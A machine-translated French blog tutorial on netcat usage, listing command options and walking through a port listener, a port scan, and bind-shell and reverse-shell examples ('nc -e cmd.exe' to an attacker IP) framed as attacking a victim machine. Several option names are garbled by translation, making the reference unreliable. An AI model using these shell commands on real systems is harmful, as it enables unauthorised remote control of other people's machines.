Utilisation de base de NC

NC est l'abréviation de netcat et est connu sous le nom de «couteau suisse» dans le monde de la sécurité des réseaux. Il utilise le protocole TCP ou UDP pour se connecter et lire des données. Il est conçu comme un outil de porte dérobée stable qui peut être facilement piloté directement par d'autres programmes et scripts. En même temps, c'est aussi un puissant outil de débogage et de détection de réseau qui peut établir presque tous les types de connexions réseau nécessaires

nc [-options] nom d'hôte port [s] [ports]…

Numéro de série Code Effet
01 -ré Courir en arrière-plan
02 -le prog La redirection de programme, une fois connectée, exécute le programme lié (plus dangereux)
03 -g Point de saut de routage source, pas plus de huit fois
04 -G Indicateurs de routage source 4, 8, 12, ...
05 -h Informations d'aide
06 -i secondes Réglage du temps de retard, utilisé pendant l'analyse du port
07 -l Mode surveillance, en attente de connexion. Une fois la connexion établie, la surveillance se termine
08 -L Mode surveillance, en attente de connexion. Une fois la connexion établie, continuez à surveiller
09 -n Adresse IP sous forme numérique
dix -o fichier Spécifiez le code hexadécimal à transmettre
11 -P port Spécifiez le numéro de port local
12 -r Spécifiez au hasard le 0 local ou le numéro de port distant
13 -s addr Adresse source locale
14 -t Répondre aux demandes entrantes en tant que telnet
15 -u Méthode UDP
16 -v Afficher les détails
17 -w Spécifiez le délai
18 -avec Mode E / S, utilisé pendant la numérisation

Tels que:
1. Appliquer http / 1.1 appliquer la méthode GET

  • Copiez la commande nc à la racine du lecteur c
  • Entrer en mode dos et se retirer à la racine
  • Type nc -l -p 80: surveiller l'entrée du port 80
  • Entrez l'adresse IP de cette machine ou 127.0.0.1 pour utiliser le port 80

2. Connectez-vous au port 80

  • Entrez dos et retraite à suivre
  • Type nc -l -p 80: surveiller l'entrée du port 80
  • Ouvrez ensuite un dos telnet local IP 80 ou 127.0.0.1 80 pour afficher la liaison

3. Analysez
l'état ouvert de tous les ports 80 à 445 de l'hôte distant 192.168.0.103

Format: nc -nvv -w2 -z 192.168.0.103 80-445
4. Connexion directe: attaquez la machine 192.168.0.100, attaquez la machine 192.168.0.103
Tâche: connectez la machine attaquante 192.168.0.100 à la machine attaquée 192.168.0.103 via le port 80 et faites fonctionner le lecteur C de la machine attaquée en temps réel.
Étape 1 Liez le shell au port 80 sur la machine attaquée 192.168.0.103.
Format: nc -vv –l –p 80 –e cmd.exe
Étape 2 L'attaquant 192.168.0.100 se connecte à l'hôte 192.168.0.103 via le port 80 et obtient le shell de l'hôte distant.
Format: formation nc 192.168.0.103 80
5 Connexion inverse: machine attaquante 192.168.0.100, machine attaquée 192.168.0.103
Tâche: connexion inverse de la machine attaquante 192.168.0.100 à la machine attaquée 192.168.0.103 via le port 8080 Et le fonctionnement en temps réel du lecteur C de la machine attaquée.
Étape 1 L'attaquant 192.168.0.100 surveille son port 8080.
Format: nc -vv –l –p 8080
Étape 2 La machine attaquée 192.168.0.103 lie le shell au port 8080 de l'attaquant, afin que l'attaquant obtienne inversement le shell de la machine attaquée.
Format: nc –e cmd.exe 192.168.0.100 8080

发布了15 篇原创文章 · 获赞 0 · 访问量 144

Je suppose que tu aimes

Origine blog.csdn.net/qq_44230959/article/details/105407718
conseillé
Classement